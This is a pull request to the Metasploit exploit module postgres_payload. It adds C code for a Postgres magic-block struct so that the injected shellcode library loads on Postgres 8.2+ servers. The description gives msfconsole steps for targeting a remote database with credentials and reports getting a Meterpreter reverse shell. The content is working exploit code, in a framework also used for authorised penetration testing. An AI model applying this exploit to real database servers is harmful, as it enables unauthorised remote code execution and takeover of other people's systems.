### PR TITLE
Postgres 8.2+ update to postgres_payload.rb module

### DIFF
--- a/modules/exploits/linux/postgres/postgres_payload.rb
+++ b/modules/exploits/linux/postgres/postgres_payload.rb
@@ -32,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         'midnitesnake', # this Metasploit module
         'egypt',        # on-the-fly compiled .so technique
-        'todb'          # original windows module this is based on
+        'todb',         # original windows module this is based on
+        'lucipher'      # updated module to work on Postgres 8.2+
       ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -152,6 +153,24 @@ class MetasploitModule < Msf::Exploit::Remote
       #define PROT_EXEC 4
 
       #define PAGESIZE 0x1000
+
+      typedef struct _Pg_magic_struct {
+        int len;
+        int version;
+        int funcmaxargs;
+        int indexmaxkeys;
+        int namedatalen;
+        int float4byval;
+        int float8byval;
+      } Pg_magic_struct;
+
+      extern const Pg_magic_struct *PG_MAGIC_FUNCTION_NAME(void);
+
+      const Pg_magic_struct * PG_MAGIC_FUNCTION_NAME(void)
+      {
+        static const Pg_magic_struct Pg_magic_data = {sizeof(Pg_magic_struct), 804, 100, 32, 64, 1, 1};
+        return &Pg_magic_data;
+      }
 
       char shellcode[] = "#{shellcode}";
 


### PR DESCRIPTION
The following update to the postgres_payload.rb module allows the
exploit to work on Postgres 8.2+ databases. Previously, the exploit
would fail due to a missing `PG_MODULE_MAGIC_DATA` struct
at the top of the imported library.

## Verification

- [x] Run a Postgres database 8.2+ on a remote IP (9.4 was used to verify during this pull request.)
- [x] Start `msfconsole`
- [x] `use exploit/linux/postgres/postgres_payload`
- [x] `set RHOST <remote Postgres IP>`
- [x] `set USERNAME <username>`
- [x] `set PASSWORD <password>`
- [x] `set DATABASE <database>` and ensure the database exists on the Postgres server
- [x] `set TARGET 0` for x86 and `set TARGET 1` for x64
- [x] Use any valid Metasploit payload. Meterpreter was used in my own verification.
- [x] `run`
- [x] Payload will successfully execute. Meterpreter shell will connect back the same as the module worked before.